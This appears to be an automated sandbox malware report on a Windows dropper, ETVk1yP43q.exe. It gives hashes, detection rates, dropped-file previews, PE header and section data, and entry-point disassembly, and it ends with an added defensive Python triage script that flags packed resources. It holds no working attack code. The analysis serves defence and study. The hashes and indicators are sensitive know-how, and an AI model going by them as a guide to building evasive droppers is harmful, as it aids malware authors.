                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6860752
                                                                                                          Entropy (8bit):7.995791234867719
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
                                                                                                          MD5:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                          SHA1:B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
                                                                                                          SHA-256:E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
                                                                                                          SHA-512:40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Process:C:\Users\user\Desktop\ETVk1yP43q.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):700768
                                                                                                          Entropy (8bit):6.940236637698784
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vt34nYwU1qWSxe5S6x/5dm88RzDgYZ7NVB2fEUKV:vt3U0Uxe06x/54tz0cHB28B
                                                                                                          MD5:912B031EAEE45A05000F7DE4E9B734BC
                                                                                                          SHA1:B75F0A7E78F591275E1E5490F791AFB701E3BE8C
                                                                                                          SHA-256:B267669009A20C53322AB5EE32BD198B7751935E058C5C0B1A079263B4FF3F16
                                                                                                          SHA-512:5B1D75A563C03115AD006E530B0E784E7EDC1DDAA711D62FA481CCE65CFDBD713D30FA79C12D8D013D6334A12B0D8BD7A9DE2860AEB92EB4C5FFCDE0EA48A918
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...`s.R..........................................@..................................y......................................t...(.......H...............`...................................................8... .......0............................text............................... ..`.data...............................@....rsrc...H...........................@..@..V............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):736
                                                                                                          Entropy (8bit):5.19291613287325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
                                                                                                          MD5:8DD2C4351E4B0D2930D563DA2C6C2A48
                                                                                                          SHA1:A1B468692AC3F74F9A2550AEAAFF0D9624513C71
                                                                                                          SHA-256:EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
                                                                                                          SHA-512:F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
                                                                                                          Malicious:false
                                                                                                          Preview:.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):793
                                                                                                          Entropy (8bit):5.017107027448105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
                                                                                                          MD5:D0E6E59B4C0A90FF05AEAEA3B850E780
                                                                                                          SHA1:1E975637110EF7EEE57C739E5B208D624F2D44C4
                                                                                                          SHA-256:99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
                                                                                                          SHA-512:62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
                                                                                                          Malicious:false
                                                                                                          Preview:.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=*.jpg;*.jpeg;*.png;*.tiff;*.gif;*.bmp;*.webp;*.psd;*.svg;*.psp;*.tga;*.ai;*.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=*.doc;*.docx;*.txt;*.rtf;*.xls;*xlsx;*.odt;*.ods;*.pdf;*.djvu;*.mobi;*.epub;*.fb2;*.ppt;*.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=*.mp3;*.wav;*.flac;*.ape;*.3gp;*.amr;*.m4a;*.m4p;*.ogg;*.oga;*.ra;*.rm;*.wv;*.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=*.avi;*.mkv;*.mp4;*.mov;*.wmv;*.flv;*.divx;*.ts;*.mpeg;*.vob;*.3gp;*.webm;*.flv;*.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1053
                                                                                                          Entropy (8bit):5.1426172167326865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:fQlPKE3CpE3zN5E38/E3F9E3nmJxE3vxE36TpE3laNE3RE3bE3ZjxE3Fg9lKE34G:cS/s5PqkQiz+aNo2ABMjG
                                                                                                          MD5:0D257FC18C0C4280C3E1B5DA5FD3CFEC
                                                                                                          SHA1:89B0C1926EA6B2CC1AFBA1C735E9EB8CC67AEC10
                                                                                                          SHA-256:3B422B43A76E79ED83D5AD439A19A24A8B0C29984660093F8FB4CBEAAAB6022D
                                                                                                          SHA-512:019674DAF1CB9DBAAE8EB01E73F43E9DD69368CA783782AD47368E13CC77B4ACF7A7C5F382869D5BBC3118462F6383694A7184C1FECC88BD9158D7B5E29E22A5
                                                                                                          Malicious:false
                                                                                                          Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:) CCCOMA_X64FRE_EN-GB_DV9..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):276
                                                                                                          Entropy (8bit):3.4156350137555784
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Q2M0lulC+Sk2lAmEoclc2omlulC+Sk2lAmEoclc2EErMJ2wlw:Q2MVrqjEocTorqjEocTvQJbw
                                                                                                          MD5:1DF88E86BA431EBE44D9BAD2791F5373
                                                                                                          SHA1:B02A80676136ED8A69308EBA7019D5A6C5BFAB10
                                                                                                          SHA-256:95EB9CC8C1164C1B000F2B565589AFB7E3795610C423E307682FDE66738C4D84
                                                                                                          SHA-512:A887C130380D1B0895C7C7305256999010EE9500E12689EEC707800DA6F0BA5F4691B82D35138697FC4AFA7B85481F806AA00C3E0913666E1A482C70D8C7E683
                                                                                                          Malicious:false
                                                                                                          Preview:..2.0.:.2.7.:.4.5. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....2.0.:.2.7.:.2.7. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....2.0.:.2.7.:.2.9. .:. .F.o.l.d.e.r.I.n.i.t. .P.A.R.A.M.S.:. .S.e.t.H.o.o.k.........
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):7576
                                                                                                          Entropy (8bit):3.627889446193429
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:t8NerYhTj7Xw4FJBjfNyxH+KzSsa0MQ8L327dfSqxtyQGYAHdvXaEyKXdPHBLpRu:t8NQYhTvw4FJBjfNyxH+KzSsa0MQ8L36
                                                                                                          MD5:44D9519EF26E2DB02DF67B321A0756CF
                                                                                                          SHA1:B80DF17C79E9801E4AE30FBD4C2F51FFAB948D78
                                                                                                          SHA-256:DC3DA88B6429769202614D24E6904C3BBEB4F5EF36C90C619F5341437B8B97F4
                                                                                                          SHA-512:5F2AC51C2C8073CC2E8C4C73FC141426B2E6C6C4EBD1348CDCC3FEB7152B1914EEF6C6207381225C91119A1A7B2F3ECA3C2C1976776B4A7C40737DD34B1D5A4F
                                                                                                          Malicious:false
                                                                                                          Preview:..2.0.:.2.7.:.1.6. .:. .D.e.l.e.t.e.F.r.o.m.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .D.e.l.e.t.e.T.a.s.k. .f.a.i.l. .C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.j.o.n.e.s.....2.0.:.2.7.:.1.6. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .S.t.a.r.t.....2.0.:.2.7.:.1.6. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .I.s.N.e.w.=.C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.j.o.n.e.s.....2.0.:.2.7.:.1.9. .:. .T.r.y.S.c.h.e.d.u.l.e.r.S.t.a.r.t. .P.A.R.A.M.S.:. .A.l.r.e.a.d.y. .e.v.a.l.u.a.t.e.d.....2.0.:.2.7.:.2.0. .E.R.R.O.R. .(.).:. .C.h.e.c.k.F.i.l.e. .M.E.S.S.:. .C.o.p.y.F.i.l.e. .n.e.w. .f.a.i.l. .P.A.R.A.M.S.:. .E.x.p.l.o.r.e.r.H.e.l.p.e.r.3.2...d.l.l. .L.A.S.T._.E.R.R. .(.3.2.,. .0.0.0.0.0.0.2.0.).:. .T.h.e. .p.r.o.c.e.s.s. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e. .b.e.c.a.u.s.e. .i.t. .i.s. .b.e.i.n.g. .u.s.e.d. .b.y. .a.n.o.t.h.e.r. .p.r.o.c.e.s.s.........2.0.:.2.7.:.3.0. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .S.t.a.r.t. .w.i.t.h. .R.
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2868
                                                                                                          Entropy (8bit):3.667732015407199
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GDpDPBCw7XbSHthW79j+zXqTNXq05yc2PB8NVsgraUVZTGX1Bh6hpDPBCw7Xt:GDdpCw7XbcrIgC5yc2J8Nugra8ZTGX16
                                                                                                          MD5:F1DB8B14B5D14857C55B7E3906C1B01A
                                                                                                          SHA1:272EDC3F809DE85F0B0619BA6ADD2B503EC2E778
                                                                                                          SHA-256:73578FF24B711F7A20EBC00A8170A4FE1D3BAE95871C5EAC7EA96EAE65937409
                                                                                                          SHA-512:F4AAB720C999EB32DA53C1F1032449CAA8A5718CF533062FD2A48705C5C6BAF5F791A8DC6C82BFF897B2010335EF140E0B177330EA77F9E7FBD3BCDE09189A45
                                                                                                          Malicious:false
                                                                                                          Preview:..0.1./.0.1./.2.0.2.5. .2.0.:.2.7.:.2.0.:. .E.R.R.O.R. .(.).:. .C.h.e.c.k.F.i.l.e. .M.E.S.S.:. .C.o.p.y.F.i.l.e. .n.e.w. .f.a.i.l. .P.A.R.A.M.S.:. .E.x.p.l.o.r.e.r.H.e.l.p.e.r.3.2...d.l.l. .L.A.S.T._.E.R.R. .(.3.2.,. .0.0.0.0.0.0.2.0.).:. .T.h.e. .p.r.o.c.e.s.s. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e. .b.e.c.a.u.s.e. .i.t. .i.s. .b.e.i.n.g. .u.s.e.d. .b.y. .a.n.o.t.h.e.r. .p.r.o.c.e.s.s.....L.a.s.t. .s.y.s.t.e.m. .e.r.r.o.r.:. .C.l.a.s.s. .d.o.e.s. .n.o.t. .e.x.i.s.t. .(.1.4.1.1.).....C.o.m.p.i.l.e.T.i.m.e.:. .2.4.-.1.2.-.2.0.1.6. .1.4.-.1.7.....T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....I.s.P.r.o.g.r.a.m.T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....P.r.o.d.u.c.t.:. .W.i.n.d.o.w.s. .1.0. .P.r.o.....S.e.r.v.i.c.e. .P.a.c.k.:. .....B.u.i.l.d.:. .0.....V.e.r.s.i.o.n.:. .6.4.-.b.i.t.....U.A.C.:. .e.n.a.b.l.e.d.....U.A.C.:. .e.l.e.v.a.t.e.d.....C.P.U.:. .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z.....N.o.r.m.F.r.e.q.:. .2.0.0.0.....R.a.w.F.r.e.q.:. .2.0.0.0.....T.
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):7.959667397423965
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:ETVk1yP43q.exe
                                                                                                          File size:8'302'080 bytes
                                                                                                          MD5:56ecf4355112dcd2f73e04d0d1784178
                                                                                                          SHA1:6ba04b9f47530333b9dda9ed424cdbf418896081
                                                                                                          SHA256:0b2cb44ca93dc45f099ad395ff46b2e9475e539ac8aa5a362e07f5f9f72425f6
                                                                                                          SHA512:b992ae5d1a23d22805f7e2325e1168d99c1be55c23c38b24b3496b12fa25483b398d4fee3b8b3a786928f8dfbd5c3b0ed462d38fa3689d51f0c0190a515cdfdc
                                                                                                          SSDEEP:196608:hCK1JhIdB4LC4BgRexpA4O1Xq7pZIBVIAg26FsluEMC/WpsvkCesIGz:g+Jo4m4iwg/qfDLKEC/WSvkCeHw
                                                                                                          TLSH:3886231273E18031FFA7A2739B2AF64556BC7D258123862F13881D7DBD741A2263E763
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                                          Icon Hash:aaf3e3e3938382a0
                                                                                                          Entrypoint:0x42800a
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x5BAFA196 [Sat Sep 29 16:00:22 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                          Instruction
                                                                                                          call 00007F1208BE1D5Dh
                                                                                                          jmp 00007F1208BD4B14h
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push edi
                                                                                                          push esi
                                                                                                          mov esi, dword ptr [esp+10h]
                                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                                          mov eax, ecx
                                                                                                          mov edx, ecx
                                                                                                          add eax, esi
                                                                                                          cmp edi, esi
                                                                                                          jbe 00007F1208BD4C9Ah
                                                                                                          cmp edi, eax
                                                                                                          jc 00007F1208BD4FFEh
                                                                                                          bt dword ptr [004C41FCh], 01h
                                                                                                          jnc 00007F1208BD4C99h
                                                                                                          rep movsb
                                                                                                          jmp 00007F1208BD4FACh
                                                                                                          cmp ecx, 00000080h
                                                                                                          jc 00007F1208BD4E64h
                                                                                                          mov eax, edi
                                                                                                          xor eax, esi
                                                                                                          test eax, 0000000Fh
                                                                                                          jne 00007F1208BD4CA0h
                                                                                                          bt dword ptr [004BF324h], 01h
                                                                                                          jc 00007F1208BD5170h
                                                                                                          bt dword ptr [004C41FCh], 00000000h
                                                                                                          jnc 00007F1208BD4E3Dh
                                                                                                          test edi, 00000003h
                                                                                                          jne 00007F1208BD4E4Eh
                                                                                                          test esi, 00000003h
                                                                                                          jne 00007F1208BD4E2Dh
                                                                                                          bt edi, 02h
                                                                                                          jnc 00007F1208BD4C9Fh
                                                                                                          mov eax, dword ptr [esi]
                                                                                                          sub ecx, 04h
                                                                                                          lea esi, dword ptr [esi+04h]
                                                                                                          mov dword ptr [edi], eax
                                                                                                          lea edi, dword ptr [edi+04h]
                                                                                                          bt edi, 03h
                                                                                                          jnc 00007F1208BD4CA3h
                                                                                                          movq xmm1, qword ptr [esi]
                                                                                                          sub ecx, 08h
                                                                                                          lea esi, dword ptr [esi+08h]
                                                                                                          movq qword ptr [edi], xmm1
                                                                                                          lea edi, dword ptr [edi+08h]
                                                                                                          test esi, 00000007h
                                                                                                          je 00007F1208BD4CF5h
                                                                                                          bt esi, 03h
                                                                                                          Programming Language:
                                                                                                          • [ASM] VS2013 build 21005
                                                                                                          • [ C ] VS2013 build 21005
                                                                                                          • [C++] VS2013 build 21005
                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                          • [ASM] VS2013 UPD5 build 40629
                                                                                                          • [RES] VS2013 build 21005
                                                                                                          • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x7207c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e9000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x7207c4 | 0x720800 | 042854e33416cf188c5c67e3f9e06067 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7e9000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc84e8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc8610 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc88f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc8a20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc98c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca170 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca6d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccc80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcdd28 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_DIALOG | 0xce190 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xce28c | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xce820 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xceeac | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf33c | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcf938 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcff94 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd03fc | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd0554 | 0x717d18 | data | | | 1.0003108978271484
RT_GROUP_ICON | 0x7e826c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x7e82e4 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x7e82f8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x7e83d4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
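The section and resource tables above already carry the numbers an analyst reaches for first when triaging a suspected dropper: a .rsrc section whose raw size (0x720800) is about 90% of the 8'302'080-byte file, a single RT_RCDATA entry of 0x717d18 bytes with ZLIB complexity of 1.0003 (the ratio of zlib-compressed to raw size; a value at or above 1.0 means the data is already compressed or encrypted), and whole-file entropy of 7.96. The Python below is an added example, not part of the Joe Sandbox report, that recomputes those indicators from the table values (embedded inline as constructed input) and adds the checks a practitioner would run next: does the entry point fall inside .text, is any section both writable and executable, and does a resource blob carry the compiled-AutoIt marker. The AU3!EA06 marker is the standard AutoIt3 compiled-script magic and is an assumption here; the report only says the binary is "likely" a compiled AutoIt script, and the sample's resource bytes are not reproduced on this page.

```python
import math
from collections import Counter

# Section table as reported for ETVk1yP43q.exe (values copied from the table above).
# (name, virtual_address, virtual_size, raw_size, characteristics)
SECTIONS = [
    (".text",  0x1000,   0x8dfdd,  0x8e000,  {"CODE", "EXECUTE", "READ"}),
    (".rdata", 0x8f000,  0x2fd8e,  0x2fe00,  {"INITIALIZED_DATA", "READ"}),
    (".data",  0xbf000,  0x8f74,   0x5200,   {"INITIALIZED_DATA", "READ", "WRITE"}),
    (".rsrc",  0xc8000,  0x7207c4, 0x720800, {"INITIALIZED_DATA", "READ"}),
    (".reloc", 0x7e9000, 0x7134,   0x7200,   {"INITIALIZED_DATA", "DISCARDABLE", "READ"}),
]
IMAGE_BASE = 0x400000
ENTRY_POINT = 0x42800a      # absolute VA as reported
FILE_SIZE = 8_302_080       # bytes, as reported

# Resource entries that matter for payload hunting: (type, rva, size, zlib_complexity)
RESOURCES = [
    ("RT_RCDATA",   0xd0554,  0x717d18, 1.0003108978271484),
    ("RT_MANIFEST", 0x7e83d4, 0x3ef,    0.5074478649453823),
]

# Compiled AutoIt3 scripts carry this marker in front of the script body. Assumption:
# standard AutoIt3 magic; the report only rates the sample as "likely" compiled AutoIt.
AU3_MAGIC = b"AU3!EA06"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_containing(va: int):
    """Name of the section whose virtual range contains an absolute VA, or None."""
    rva = va - IMAGE_BASE
    for name, vaddr, vsize, _raw, _flags in SECTIONS:
        if vaddr <= rva < vaddr + vsize:
            return name
    return None


def triage_sections():
    """Cheap static indicators: where execution starts, which section holds the bulk of
    the file, writable+executable sections, and resources zlib cannot shrink."""
    findings = {}
    findings["entry_section"] = section_containing(ENTRY_POINT)
    findings["wx_sections"] = [n for n, *_, f in SECTIONS if {"WRITE", "EXECUTE"} <= f]
    name, _va, _vs, raw, _f = max(SECTIONS, key=lambda s: s[3])
    findings["dominant_section"] = name
    findings["dominant_ratio"] = round(raw / FILE_SIZE, 3)
    # ZLIB complexity near 1.0 means already compressed or encrypted; for a large
    # RT_RCDATA entry that is the classic embedded-payload signal.
    findings["opaque_resources"] = [
        t for t, _rva, size, zc in RESOURCES if zc >= 0.99 and size > 64 * 1024
    ]
    return findings


def find_au3_marker(blob: bytes) -> int:
    """Offset of the AutoIt3 compiled-script marker inside a resource blob, or -1."""
    return blob.find(AU3_MAGIC)


if __name__ == "__main__":
    print(triage_sections())
    # Constructed stand-in for an RCDATA blob: filler, the marker, then script-like bytes.
    fake_rcdata = b"\x00" * 16 + AU3_MAGIC + bytes(range(256))
    print("AU3 marker at offset", find_au3_marker(fake_rcdata))
    print("entropy of 256 distinct bytes:", shannon_entropy(bytes(range(256))))
```

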